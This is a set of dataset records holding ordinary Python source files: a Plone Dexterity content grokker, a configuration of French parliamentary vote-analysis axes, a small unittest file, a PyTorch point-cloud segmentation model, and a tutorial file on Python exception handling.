+{"seq_id":"145531147","text":"import martian\nimport grokcore.component\n\nfrom zope.component import queryUtility\nfrom zope.component import provideUtility\n\nfrom zope.component.interfaces import IFactory\nfrom zope.component.factory import Factory\n\nfrom plone.dexterity.content import DexterityContent\n\nfrom App.class_init import InitializeClass\ntry:\n from OFS.metaconfigure import registerClass\nexcept ImportError:\n # BBB\n from Products.Five.fiveconfigure import registerClass\n\n\nclass add_permission(martian.Directive):\n \"\"\"Directive used to specify the add permission of an object\n \"\"\"\n scope = martian.CLASS\n store = martian.ONCE\n default = None\n validate = martian.validateText\n\n def factory(self, permission):\n return permission\n\n\nclass ContentGrokker(martian.ClassGrokker):\n martian.component(DexterityContent)\n\n martian.directive(add_permission, default=None)\n martian.directive(grokcore.component.name, default=None)\n\n def execute(self, class_, config, add_permission, name, **kw):\n\n # Register class if a meta type was specified.\n # (most types will probably not need this.)\n\n if add_permission:\n meta_type = getattr(class_, 'meta_type', None)\n registerClass(config, class_, meta_type, add_permission)\n\n # Register a factory utility - defer this to the end of ZCML\n # processing, since there may have been another utility manually\n # registered\n\n if name:\n config.action(\n discriminator=('dexterity:registerFactory', class_, name),\n callable=register_factory,\n args=(class_, name),\n order=9999,\n )\n\n # Initialise class security\n\n config.action(\n discriminator=('dexterity:registerClass', class_),\n callable=InitializeClass,\n args=(class_,)\n )\n\n return True\n\n\ndef register_factory(class_, name):\n\n # Register factory if not already registered\n factory = queryUtility(IFactory, name=name)\n if factory is None:\n provideUtility(Factory(class_), IFactory, name)\n\n__all__ = ('portal_type', 'meta_type', 'add_permission',)\n","sub_path":"plone/directives/dexterity/content.py","file_name":"content.py","file_ext":"py","file_size_in_byte":2199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"107196732","text":"# -*- coding: utf-8 -*-\n\naxes = [(u'Assemblée',{'titre':u\"Votes de l'Assemblée\",'source':'assemblee','label':'libelle','key':'libelleAbrev',\n 'item_field':'organes','item_compare':'$contains'}),\n ('Groupes',{'titre':u\"Votes par Groupe parlementaire\",'source':'organes','label':'libelle','key':'uid',\n 'item_field':'groupe','item_compare':'$eq'}),\n ('Commissions',{'titre':u\"Votes par Commission parlementaire\",'source':'commissions','label':'libelle','key':'uid',\n 'item_field':'commissions','item_compare':'$contains'}),\n ('Région',{'titre':u\"Votes par région\",'source':'acteurs','label':'region','key':'region',\n 'item_field':'region','item_compare':'$eq'}),\n ('Type Région',{'titre':u\"Votes par type de région\",'source':'acteurs','label':'typeregion','key':'typeregion',\n 'item_field':'typeregion','item_compare':'$eq'}),\n (u'Département',{'titre':u\"Votes par département\",'source':'acteurs','label':'departement','key':'departement',\n 'item_field':'departement','item_compare':'$eq','hidechart':True}),\n ('Ages',{'titre':u\"Votes par age\",'source':'acteurs','label':'classeage','key':'classeage',\n 'item_field':'classeage','item_compare':'$eq'}),\n ('CSP',{'titre':u\"Votes par Catégorie Socio-Professionelle\",'source':'acteurs','label':'csp','key':'csp',\n 'item_field':'csp','item_compare':'$eq'}),\n ('Sexe',{'titre':u\"Votes par sexe\",'source':'acteurs','label':'sexe','key':'sexe',\n 'item_field':'sexe','item_compare':'$eq'}),\n ]\naxes = {'groupes':{'libelle':'Groupes',\n 'elements':'G',\n 'hidechart':False,\n 'titre':'Votes par Groupe parlementaire',\n 'source':{'nom':'organes','filtre':{'codeType':'GP','actif':True},'key':'uid','label':'libelle'},\n 'votes':{'field':'groupe'}},\n 'assemblee':{'libelle':'Assemblée',\n 'elements':'G',\n 'hidechart':False,\n 'titre':\"Votes de l'Assemblée\",\n 'source':{'nom':'organes','filtre':{'codeType':'ASSEMBLEE','actif':True},'key':'libelleAbrev','label':'libelle'},\n 'votes':{'field':'organes'}},\n 'commissions':{'libelle':'Commissions',\n 'elements':'G',\n 'titre':'Votes par Commissions',\n 'source':{'nom':'organes','filtre':{'$and':[{'$or':[{'codeType':'COMPER'},{'codeType':'CONFPT'}]},{'actif':True}]},'key':'uid','label':'libelle'},\n 'votes':{'field':'commissions'}},\n 'regions':{'libelle':'Régions',\n 'elements':'G',\n 'titre':'Votes par Régions',\n 'source':{'nom':'acteurs','filtre':{},'key':'region','label':'region'},\n 'votes':{'field':'region'}},\n 'typeregion':{'libelle':'Type Régions',\n 'elements':'G',\n 'titre':'Votes par Type de régions',\n 'source':{'nom':'acteurs','filtre':{},'key':'typeregion','label':'typeregion'},\n 'votes':{'field':'typeregion'}},\n 'departements':{'libelle':'Départements',\n 'elements':'G',\n 'titre':'Votes par Départements',\n 'source':{'nom':'acteurs','filtre':{},'key':'departement','label':'departement'},\n 'votes':{'field':'departement'}},\n 'ages':{'libelle':\"Classes d'age\",\n 'elements':'G',\n 'titre':\"Votes par classe d'age\",\n 'source':{'nom':'acteurs','filtre':{},'key':'classeage','label':'classeage'},\n 'votes':{'field':'classeage'}},\n 'csp':{'libelle':\"Catégorie Socio-professionnelle\",\n 'elements':'G',\n 'titre':'Votes par Catégorie Socio-professionnelle',\n 'source':{'nom':'acteurs','filtre':{},'key':'csp','label':'csp'},\n 'votes':{'field':'csp'}},\n 'sexe':{'libelle':\"Sexe\",\n 'elements':'G',\n 'titre':'Votes par sexe',\n 'source':{'nom':'acteurs','filtre':{},'key':'sexe','label':'sexe'},\n 'votes':{'field':'sexe'}},\n 'depute':{'libelle':\"Députés\",\n 'elements':'P',\n 'titre':'Votes par député',\n 'source':{'nom':'acteurs','filtre':{},'key':'uid','label':'prenomnom'},\n 'votes':{'field':'uid'}},\n\n 'scrutin':{'libelle':\"Scrutins\",\n 'elements':'G',\n 'tris':['datescrutin'],\n 'tri_defaut':'datescrutin',\n 'titre':'Votes par scrutin',\n 'source':{'nom':'scrutins','filtre':{},'key':'scrutin_id','label':'scrutin_fulldesc'},\n 'votes':{'field':'scrutin_id'}},\n 'typescrutin':{'libelle':\"Type scrutins\",\n 'elements':'G',\n 'tris':['datescrutin'],\n 'tri_defaut':'datescrutin',\n 'titre':'Votes par type de scrutin',\n 'source':{'nom':'scrutins','filtre':{},'key':'scrutin_type','label':'scrutin_typeLibelle'},\n 'votes':{'field':'scrutin_type'}},\n\n 'dossierleg':{'libelle':\"Dossier législatif\",\n 'elements':'G',\n 'tris':['datescrutin'],\n 'tri_defaut':'datescrutin',\n 'titre':'Votes par dossier législatif',\n 'source':{'nom':'scrutins','filtre':{},'key':'scrutin_dossier','label':'scrutin_dossierLibelle'},\n 'votes':{'field':'scrutin_dossier'}},\n\n }\naxes_order = ['assemblee','groupes','commissions','typeregion','regions','departements','ages','csp','sexe','depute','scrutin','typescrutin','dossierleg']\ndef vide(ctx,v):\n if (v=='-'):\n return float(-1) if ctx['desc']=='1' else float(10000000)\n else:\n return v\n\nimport datetime\nsortfcts = {\n 'participation': {'libelle':'Participation','fct':lambda ctx,x:vide(ctx,x['participation'])},\n 'pctpour': {'libelle':'% Votes pour', 'fct': lambda ctx,x:vide(ctx,x['stats'][ctx['suffrages']]['pour']['pct'])},\n 'pctcontre': {'libelle':'% Votes contre', 'fct': lambda ctx,x:vide(ctx,x['stats'][ctx['suffrages']]['contre']['pct'])},\n 'pctabs': {'libelle':'% Votes abstention', 'fct': lambda ctx,x:vide(ctx,x['stats'][ctx['suffrages']]['abstention']['pct'])},\n 'alpha': {'libelle':'Ordre Alphabétique', 'fct': lambda ctx,x:x['label']},\n 'ficompat': {'libelle':'FI-Compatibilité', 'fct': lambda ctx,x:vide(ctx,x['stats']['fiemcpt']['votefi']['pct'])},\n 'emcompat': {'libelle':'EM-Compatibilité', 'fct': lambda ctx,x:vide(ctx,x['stats']['fiemcpt']['voteem']['pct'])},\n 'datescrutin': {'libelle':'par N° de scrutin', 'fct': lambda ctx,x:x['scrutin_num']}\n }\nsortfcts_order = ['participation','pctpour','pctcontre','pctabs','alpha','ficompat','emcompat']\n\nimport locale\nlocale.setlocale(locale.LC_ALL, 'fr_FR.utf8')\n","sub_path":"models/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":7210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"536306664","text":"#!/usr/bin/env python2.7\n\nimport unittest\nimport timecalc\n\nclass TestTime(unittest.TestCase):\n\n def test_chronos1(self):\n result = timecalc.chronos(2, [0, 3], [1, 5])\n expected = 8\n self.assertEqual(expected, result)\n \n def test_chronos2(self):\n result = timecalc.chronos(3, [-3, 3, 5], [0, 5, -1])\n expected = 12\n self.assertEqual(expected, result)\n \nimport sys \n \ndef main(out = sys.stderr, verbosity = 2): \n loader = unittest.TestLoader() \n \n suite = loader.loadTestsFromModule(sys.modules[__name__]) \n unittest.TextTestRunner(out, verbosity = verbosity).run(suite) \n \nif __name__ == '__main__': \n with open('unittestresult.txt', 'w') as f: \n main(f) \n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"test_timecalc2.py","file_name":"test_timecalc2.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"294028145","text":"\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch import einsum\nfrom einops import rearrange, repeat\nfrom pointnet2_ops import pointnet2_utils\n\ndef square_distance(src, dst):\n \"\"\"\n Calculate Euclid distance between each two points.\n src^T * dst = xn * xm + yn * ym + zn * zm;\n sum(src^2, dim=-1) = xn*xn + yn*yn + zn*zn;\n sum(dst^2, dim=-1) = xm*xm + ym*ym + zm*zm;\n dist = (xn - xm)^2 + (yn - ym)^2 + (zn - zm)^2\n = sum(src**2,dim=-1)+sum(dst**2,dim=-1)-2*src^T*dst\n Input:\n src: source points, [B, N, C]\n dst: target points, [B, M, C]\n Output:\n dist: per-point square distance, [B, N, M]\n \"\"\"\n B, N, _ = src.shape\n _, M, _ = dst.shape\n dist = -2 * torch.matmul(src, dst.permute(0, 2, 1))\n dist += torch.sum(src ** 2, -1).view(B, N, 1)\n dist += torch.sum(dst ** 2, -1).view(B, 1, M)\n return dist\n\n\ndef index_points(points, idx):\n \"\"\"\n Input:\n points: input points data, [B, N, C]\n idx: sample index data, [B, S]\n Return:\n new_points:, indexed points data, [B, S, C]\n \"\"\"\n device = points.device\n B = points.shape[0]\n view_shape = list(idx.shape)\n view_shape[1:] = [1] * (len(view_shape) - 1)\n repeat_shape = list(idx.shape)\n repeat_shape[0] = 1\n batch_indices = torch.arange(B, dtype=torch.long).to(device).view(view_shape).repeat(repeat_shape)\n new_points = points[batch_indices, idx, :]\n return new_points\n\n\ndef farthest_point_sample(xyz, npoint):\n \"\"\"\n Input:\n xyz: pointcloud data, [B, N, 3]\n npoint: number of samples\n Return:\n centroids: sampled pointcloud index, [B, npoint]\n \"\"\"\n device = xyz.device\n B, N, C = xyz.shape\n centroids = torch.zeros(B, npoint, dtype=torch.long).to(device)\n distance = torch.ones(B, N).to(device) * 1e10\n farthest = torch.randint(0, N, (B,), dtype=torch.long).to(device)\n batch_indices = torch.arange(B, dtype=torch.long).to(device)\n for i in range(npoint):\n centroids[:, i] = farthest\n centroid = xyz[batch_indices, farthest, :].view(B, 1, 3)\n dist = torch.sum((xyz - centroid) ** 2, -1)\n distance = torch.min(distance, dist)\n farthest = torch.max(distance, -1)[1]\n return centroids\n\n\ndef query_ball_point(radius, nsample, xyz, new_xyz):\n \"\"\"\n Input:\n radius: local region radius\n nsample: max sample number in local region\n xyz: all points, [B, N, 3]\n new_xyz: query points, [B, S, 3]\n Return:\n group_idx: grouped points index, [B, S, nsample]\n \"\"\"\n device = xyz.device\n B, N, C = xyz.shape\n _, S, _ = new_xyz.shape\n group_idx = torch.arange(N, dtype=torch.long).to(device).view(1, 1, N).repeat([B, S, 1])\n sqrdists = square_distance(new_xyz, xyz)\n group_idx[sqrdists > radius ** 2] = N\n group_idx = group_idx.sort(dim=-1)[0][:, :, :nsample]\n group_first = group_idx[:, :, 0].view(B, S, 1).repeat([1, 1, nsample])\n mask = group_idx == N\n group_idx[mask] = group_first[mask]\n return group_idx\n\n\ndef knn_point(nsample, xyz, new_xyz):\n \"\"\"\n Input:\n nsample: max sample number in local region\n xyz: all points, [B, N, C]\n new_xyz: query points, [B, S, C]\n Return:\n group_idx: grouped points index, [B, S, nsample]\n \"\"\"\n sqrdists = square_distance(new_xyz, xyz)\n _, group_idx = torch.topk(sqrdists, nsample, dim=-1, largest=False, sorted=False)\n return group_idx\n\n\nclass LocalGrouper(nn.Module):\n def __init__(self, groups, kneighbors, **kwargs):\n \"\"\"\n Give xyz[b,p,3] and fea[b,p,d], return new_xyz[b,g,3] and new_fea[b,g,k,2d]\n :param groups: groups number\n :param kneighbors: k-nerighbors\n :param kwargs: others\n \"\"\"\n super(LocalGrouper, self).__init__()\n self.groups = groups\n self.kneighbors = kneighbors\n\n def forward(self, xyz, points):\n B, N, C = xyz.shape\n S = self.groups\n xyz = xyz.contiguous() # xyz [btach, points, xyz]\n\n # fps_idx = farthest_point_sample(xyz, self.groups).long()\n fps_idx = pointnet2_utils.furthest_point_sample(xyz, self.groups).long() # [B, npoint]\n new_xyz = index_points(xyz, fps_idx)\n new_points = index_points(points, fps_idx)\n\n idx = knn_point(self.kneighbors, xyz, new_xyz)\n # idx = query_ball_point(radius, nsample, xyz, new_xyz)\n # grouped_xyz = index_points(xyz, idx) # [B, npoint, nsample, C]\n grouped_points = index_points(points, idx)\n grouped_points_norm = grouped_points - new_points.view(B, S, 1, -1)\n new_points = torch.cat([grouped_points_norm,\n new_points.view(B, S, 1, -1).repeat(1, 1, self.kneighbors, 1)]\n , dim=-1)\n return new_xyz, new_points\n\n\nclass FCBNReLU1D(nn.Module):\n def __init__(self, in_channels, out_channels, kernel_size=1, bias=False):\n super(FCBNReLU1D, self).__init__()\n self.net = nn.Sequential(\n nn.Conv1d(in_channels=in_channels, out_channels=out_channels, kernel_size=kernel_size, bias=bias),\n nn.BatchNorm1d(out_channels),\n nn.ReLU(inplace=True)\n )\n\n def forward(self, x):\n return self.net(x)\n\n\nclass FCBNReLU1DRes(nn.Module):\n def __init__(self, channel, kernel_size=1, bias=False):\n super(FCBNReLU1DRes, self).__init__()\n self.net = nn.Sequential(\n nn.Conv1d(in_channels=channel, out_channels=channel, kernel_size=kernel_size, bias=bias),\n nn.BatchNorm1d(channel),\n nn.ReLU(inplace=True),\n nn.Conv1d(in_channels=channel, out_channels=channel, kernel_size=kernel_size, bias=bias),\n nn.BatchNorm1d(channel)\n )\n\n def forward(self, x):\n return F.relu(self.net(x)+x, inplace=True)\n\n\nclass Attention(nn.Module):\n def __init__(self, dim, heads = 8, dim_head = 32, dropout = 0.):\n super().__init__()\n inner_dim = dim_head * heads\n # project_out = not (heads == 1 and dim_head == dim)\n self.heads = heads\n self.scale = dim_head ** -0.5\n\n self.attend = nn.Softmax(dim = -1)\n self.to_qkv = nn.Linear(dim, inner_dim * 3, bias = False)\n\n self.to_out = nn.Sequential(\n nn.Conv1d(inner_dim, dim,1),\n nn.BatchNorm1d(dim)\n )\n\n def forward(self, x):\n x = x.permute(0,2,1)\n b, n, _, h = *x.shape, self.heads\n qkv = self.to_qkv(x).chunk(3, dim = -1)\n q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h = h), qkv)\n\n dots = einsum('b h i d, b h j d -> b h i j', q, k) * self.scale\n\n attn = self.attend(dots)\n\n out = einsum('b h i j, b h j d -> b h i d', attn, v)\n out = rearrange(out, 'b h n d -> b (h d) n')\n\n return self.to_out(out)\n\n\nclass TransformerBlock(nn.Module):\n def __init__(self, dim, heads=8, dim_head=32, **kwargs):\n \"\"\"\n [b batch, d dimension, k points]\n :param dim: input data dimension\n :param heads: heads number\n :param dim_head: dimension in each head\n :param kwargs:\n \"\"\"\n super(TransformerBlock, self).__init__()\n self.attention = Attention(dim=dim, heads=heads, dim_head=dim_head)\n self.ffn = nn.Sequential(\n nn.Conv1d(dim, dim, 1, bias=False),\n nn.BatchNorm1d(dim)\n )\n\n\n def forward(self, x):\n \"\"\"\n :input x: [b batch, d dimension, p points,]\n :return: [b batch, d dimension, p points,]\n \"\"\"\n att = self.attention(x)\n att = F.relu(att+x, inplace=True)\n out = self.ffn(att)\n out = F.relu(att+out, inplace=True)\n return out\n\n\nclass PreExtraction(nn.Module):\n def __init__(self, channels, blocks=1):\n \"\"\"\n input: [b,g,k,d]: output:[b,d,g]\n :param channels:\n :param blocks:\n \"\"\"\n super(PreExtraction, self).__init__()\n operation = []\n for _ in range(blocks):\n operation.append(\n FCBNReLU1DRes(channels)\n )\n self.operation = nn.Sequential(*operation)\n self.transformer = TransformerBlock(channels, heads=4)\n def forward(self, x):\n b, n, s, d = x.size() # torch.Size([32, 512, 32, 6])\n x = x.permute(0, 1, 3, 2)\n x = x.reshape(-1, d, s)\n batch_size, _, N = x.size()\n x = self.operation(x) # [b, d, k]\n x = self.transformer(x)\n x = F.adaptive_max_pool1d(x, 1).view(batch_size, -1)\n x = x.reshape(b, n, -1).permute(0, 2, 1)\n return x\n\n\nclass PosExtraction(nn.Module):\n def __init__(self, channels, blocks=1):\n \"\"\"\n input[b,d,g]; output[b,d,g]\n :param channels:\n :param blocks:\n \"\"\"\n super(PosExtraction, self).__init__()\n operation = []\n for _ in range(blocks):\n operation.append(\n FCBNReLU1DRes(channels)\n )\n self.operation = nn.Sequential(*operation)\n self.transformer = TransformerBlock(channels, heads=4)\n\n def forward(self, x): # [b, d, k]\n return self.transformer(self.operation(x))\n\n\nclass encoder_stage(nn.Module):\n def __init__(self, anchor_points=1024, channel=64,\n pre_blocks=2, pos_blocks=2, k_neighbor=32, reduce=False, **kwargs):\n super(encoder_stage, self).__init__()\n out_channel = channel * 2\n # append local_grouper_list\n self.reduce = reduce\n if self.reduce:\n self.reducer = nn.Sequential(\n nn.Linear(out_channel, channel),\n nn.ReLU(inplace=True)\n )\n out_channel = channel\n self.local_grouper = LocalGrouper(anchor_points, k_neighbor) # [b,g,k,d]\n # append pre_block_list\n self.pre_block_module = PreExtraction(out_channel, pre_blocks)\n # append pos_block_list\n self.pos_block_module = PosExtraction(out_channel, pos_blocks)\n\n def forward(self, xyz, x):\n xyz, x = self.local_grouper(xyz, x.permute(0, 2, 1)) # [b,g,3] [b,g,k,d]\n if hasattr(self,\"reducer\"):\n x = self.reducer(x)\n x = self.pre_block_module(x) # [b,d,g]\n x = self.pos_block_module(x) # [b,d,g]\n return xyz, x\n\nclass PointNetFeaturePropagation(nn.Module):\n def __init__(self, in_channel, mlp):\n super(PointNetFeaturePropagation, self).__init__()\n self.mlp_convs = nn.ModuleList()\n self.mlp_bns = nn.ModuleList()\n last_channel = in_channel\n for out_channel in mlp:\n self.mlp_convs.append(nn.Conv1d(last_channel, out_channel, 1))\n self.mlp_bns.append(nn.BatchNorm1d(out_channel))\n last_channel = out_channel\n\n def forward(self, xyz1, xyz2, points1, points2):\n \"\"\"\n Input:\n xyz1: input points position data, [B, C, N]\n xyz2: sampled input points position data, [B, C, S]\n points1: input points data, [B, D, N]\n points2: input points data, [B, D, S]\n Return:\n new_points: upsampled points data, [B, D', N]\n \"\"\"\n # xyz1 = xyz1.permute(0, 2, 1)\n # xyz2 = xyz2.permute(0, 2, 1)\n\n points2 = points2.permute(0, 2, 1)\n B, N, C = xyz1.shape\n _, S, _ = xyz2.shape\n\n if S == 1:\n interpolated_points = points2.repeat(1, N, 1)\n else:\n dists = square_distance(xyz1, xyz2)\n dists, idx = dists.sort(dim=-1)\n dists, idx = dists[:, :, :3], idx[:, :, :3] # [B, N, 3]\n\n dist_recip = 1.0 / (dists + 1e-8)\n norm = torch.sum(dist_recip, dim=2, keepdim=True)\n weight = dist_recip / norm\n interpolated_points = torch.sum(index_points(points2, idx) * weight.view(B, N, 3, 1), dim=2)\n\n if points1 is not None:\n points1 = points1.permute(0, 2, 1)\n new_points = torch.cat([points1, interpolated_points], dim=-1)\n else:\n new_points = interpolated_points\n\n new_points = new_points.permute(0, 2, 1)\n for i, conv in enumerate(self.mlp_convs):\n bn = self.mlp_bns[i]\n new_points = F.relu(bn(conv(new_points)),inplace=True)\n return new_points\n\n\n\n\nclass get_model(nn.Module):\n def __init__(self, num_classes=50,points=2048, embed_dim=128, normal_channel=True,\n pre_blocks=[2,2,2,2], pos_blocks=[2,2,2,2], k_neighbors=[32,32,32,32],\n reducers=[2,2,2,2], **kwargs):\n super(get_model, self).__init__()\n # self.stages = len(pre_blocks)\n self.num_classes = num_classes\n self.points=points\n input_channel=6 if normal_channel else 3\n self.embedding = nn.Sequential(\n FCBNReLU1D(input_channel, embed_dim),\n FCBNReLU1D(embed_dim, embed_dim)\n )\n\n self.encoder_stage1 = encoder_stage(anchor_points=points//4, channel=128, reduce=False,\n pre_blocks=2, pos_blocks=2, k_neighbor=32)\n self.encoder_stage2 = encoder_stage(anchor_points=points//8, channel=256, reduce=True,\n pre_blocks=2, pos_blocks=2, k_neighbor=32)\n self.encoder_stage3 = encoder_stage(anchor_points=points // 16, channel=256, reduce=False,\n pre_blocks=2, pos_blocks=2, k_neighbor=32)\n self.encoder_stage4 = encoder_stage(anchor_points=points // 32, channel=512, reduce=True,\n pre_blocks=2, pos_blocks=2, k_neighbor=32)\n\n self.fp4 = PointNetFeaturePropagation(in_channel=(512+512), mlp=[512,256,256])\n self.fp3 = PointNetFeaturePropagation(in_channel=256+256, mlp=[512, 256, 256])\n self.fp2 = PointNetFeaturePropagation(in_channel=256 + 256, mlp=[256, 256])\n self.fp1 = PointNetFeaturePropagation(in_channel=256+128+128, mlp=[256, 256])\n\n self.info_encoder = nn.Sequential(\n FCBNReLU1D(16+3+input_channel, 128),\n FCBNReLU1D(128, 128),\n )\n self.global_encoder = nn.Sequential(\n FCBNReLU1D(512, 256),\n FCBNReLU1D(256, 128),\n )\n\n self.conv0 = nn.Conv1d(256, 256, 1)\n self.bn0 = nn.BatchNorm1d(256)\n self.drop0 = nn.Dropout(0.4)\n self.conv1 = nn.Conv1d(256, 128, 1)\n self.bn1 = nn.BatchNorm1d(128)\n self.drop1 = nn.Dropout(0.4)\n self.conv2 = nn.Conv1d(128, num_classes, 1)\n\n def forward(self, x, cls_label):\n points_0 = x\n B, C, N = x.shape\n xyz = x.permute(0, 2, 1)[:,:,:3]\n batch_size, _, _ = x.size()\n x = self.embedding(x) # B,D,N\n xyz_1, fea_1 = self.encoder_stage1(xyz, x) # [b,p1,3] [b,d1,p1]\n xyz_2, fea_2 = self.encoder_stage2(xyz_1, fea_1) # [b,p2,3] [b,d2,p2]\n xyz_3, fea_3 = self.encoder_stage3(xyz_2, fea_2) # [b,p3,3] [b,d3,p3]\n xyz_4, fea_4 = self.encoder_stage4(xyz_3, fea_3) # [b,p4,3] [b,d4,p3]\n global_context = F.adaptive_max_pool1d(fea_4, 1)\n\n l3_points = self.fp4(xyz_3, xyz_4, fea_3, fea_4)\n l2_points = self.fp3(xyz_2, xyz_3, fea_2, l3_points)\n l1_points = self.fp2(xyz_1, xyz_2, fea_1, l2_points)\n cls_label_one_hot = cls_label.view(B, 16, 1).repeat(1, 1, N)\n extra_info = torch.cat([cls_label_one_hot, xyz.permute(0, 2, 1), points_0], 1)\n extra_info = self.info_encoder(extra_info)\n global_context = self.global_encoder(global_context)\n l0_points = self.fp1(xyz, xyz_1, torch.cat([extra_info,global_context.expand_as(extra_info) ], 1), l1_points)\n\n # FC layers\n feat = F.relu(self.bn0(self.conv0(l0_points)), inplace=True)\n feat = self.drop0(feat)\n feat = F.relu(self.bn1(self.conv1(feat)),inplace=True)\n x = self.drop1(feat)\n x = self.conv2(x)\n x = F.log_softmax(x, dim=1)\n x = x.permute(0, 2, 1)\n return x, xyz_3.permute(0, 2, 1)\n\n\n\n\nclass get_loss(nn.Module):\n def __init__(self):\n super(get_loss, self).__init__()\n\n def forward(self, pred, target, trans_feat):\n total_loss = F.nll_loss(pred, target)\n\n return total_loss\n\nif __name__ == '__main__':\n data = torch.rand(2,128,10)\n att = Attention(128)\n out = att(data)\n print(out.shape)\n\n\n\n batch, groups,neighbors,dim=2,512,32,16\n x = torch.rand(batch,groups,neighbors,dim)\n pre_extractor = PreExtraction(dim,3)\n out = pre_extractor(x)\n print(out.shape)\n\n x = torch.rand(batch, dim, groups)\n pos_extractor = PosExtraction(dim, 3)\n out = pos_extractor(x)\n print(out.shape)\n\n\n data = torch.rand(2, 6, 1024)\n cls_label = torch.rand([2, 16])\n print(\"===> testing model ...\")\n model = get_model(points=1024)\n out,_ = model(data, cls_label)\n print(out.shape)\n","sub_path":"part_segmentation/models/pointsformerE.py","file_name":"pointsformerE.py","file_ext":"py","file_size_in_byte":16860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"507229300","text":"\"\"\"\r\nPoints to remember:\r\n1. syntax:\r\ntry:\r\n pass\r\nexcept (RuntimeError, TypeError, NameError):\r\n pass\r\nexcept ZeroDivisionError as e:\r\n print (e)\r\nexcept NameError:\r\n pass\r\nexcept:\r\n pass\r\nelse:\r\n pass\r\nfinally:\r\n pass\r\n\r\nNote: 1. try-else is not possible\r\n 2. It should follow this order try->except->else->finally.\r\n 3. default except must be last except statement(only except without exception)\r\n 4. It can have multiple except statement but only one except statement executed.\r\n 5. Each except clause can have multiple exceptions\r\n 6. It can have duplicate except clause but there is no use of duplicate clause\r\n 7. the except block of code executed when try block throws any exception.\r\n 7. The else block of code is executed only when there no exception occurs in try block.(When try block does not raise any exception).\r\n 8. The finally block of code always executed whether we got exception or not.\r\n 9. Exception() takes no keyword arguments.(Pass only positional argument)\r\n\"\"\"\r\n\r\ntry :\r\n a = int(input(\"enter any no :\"))\r\n b = 12\r\n c = b / a\r\n print (c)\r\nexcept ZeroDivisionError as x:\r\n print (x)\r\nelse :\r\n print(\"else part\")\r\nfinally :\r\n print (\"finally part\") \r\n \r\n\r\nimport sys\r\ntry:\r\n f = open('myfile.txt')\r\n s = f.readline()\r\n i = int(s.strip())\r\nexcept OSError as err:\r\n print(\"OS error: {0}\".format(err))\r\nexcept ValueError:\r\n print(\"Could not convert data to an integer.\")\r\nexcept:\r\n print(\"Unexpected error:\", sys.exc_info()[0])\r\n raise\r\n \r\n \r\n\r\n## Manually raising an exception: raise IntanceOfBaseException(). It must be either a subclass or an instance of BaseException\r\ndef functionName( level ):\r\n if level <1:\r\n raise Exception(\"Invalid Level\",level) # Exception() takes no keyword arguments.(Pass only positional argument)\r\n return level\r\n\r\ntry:\r\n l = functionName(-10)\r\n print (\"level = \",l)\r\nexcept Exception as e:\r\n print (\"error in level argument\",e.args[0],e.args[1]) # error in level argument Invalid Level -10\r\n print(e) # ('Invalid Level', -10)\r\n print(type(e)) #
\r\n\r\n\r\n \r\n## User-defined Exceptions: Exceptions should typically be derived from the Exception class, either directly or indirectly.\r\nclass MultiplyByZeroError(Exception): # Note: user defined exceptions must derive from BaseException\r\n def __init__(self, *args):\r\n self.args = args\r\n # super().__init__(*args)\r\n\r\n def __str__(self):\r\n return str(self.args)\r\ntry:\r\n if 5 * 0 == 0:\r\n raise MultiplyByZeroError(\"Bad hostname\", 5)\r\nexcept MultiplyByZeroError as e:\r\n print(e) # ('Bad hostname', 5)\r\n print(type(e)) # \r\n\r\n \r\n\r\n## creating base exception for all errors:\r\nclass Error(Exception):\r\n \"\"\"Base class for exceptions in this module.\"\"\"\r\n pass\r\n\r\nclass InputError(Error):\r\n \"\"\"Exception raised for errors in the input.\r\n\r\n Attributes:\r\n expression -- input expression in which the error occurred\r\n message -- explanation of the error\r\n \"\"\"\r\n\r\n def __init__(self, expression, message):\r\n self.expression = expression\r\n self.message = message\r\n\r\nclass TransitionError(Error):\r\n \"\"\"Raised when an operation attempts a state transition that's not\r\n allowed.\r\n\r\n Attributes:\r\n previous -- state at beginning of transition\r\n next -- attempted new state\r\n message -- explanation of why the specific transition is not allowed\r\n \"\"\"\r\n\r\n def __init__(self, previous, next, message):\r\n self.previous = previous\r\n self.next = next\r\n self.message = message\r\n \r\n\r\n#Defining Clean-up Actions: \r\n\"\"\"\r\nA finally clause is always executed before leaving the try statement, whether an exception has occurred or not. When an exception \r\nhas occurred in the try clause and has not been handled by an except clause (or it has occurred in an except or else clause), it \r\nis re-raised after the finally clause has been executed. The finally clause is also executed “on the way out” when any other clause\r\nof the try statement is left via a break, continue or return statement. A more complicated example:\r\n\"\"\"\r\n\r\ndef divide(x, y):\r\n try:\r\n result = x / y\r\n except ZeroDivisionError:\r\n print(\"division by zero!\")\r\n else:\r\n print(\"result is\", result)\r\n raise Exception(\"Re-raise exception\")\r\n finally:\r\n print(\"executing finally clause\")\r\n\r\ndivide(2, 1)\r\n\"\"\"\r\nresult is 2.0\r\n\r\nTraceback (most recent call last):\r\nexecuting finally clause\r\n\r\n File \"C:/Users/Test/test.py\", line 12, in \r\n divide(2, 1)\r\n File \"C:/Users/Test/test.py\", line 8, in divide\r\n raise Exception(\"Re-raise exception\")\r\n\r\nException: Re-raise exception\r\nProcess finished with exit code 1\r\n\"\"\"\r\ndivide(2, 0)\r\ndivide(\"2\", \"1\")\r\n","sub_path":"Project-Python/exception/exceptionHandlingEx.py","file_name":"exceptionHandlingEx.py","file_ext":"py","file_size_in_byte":4898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
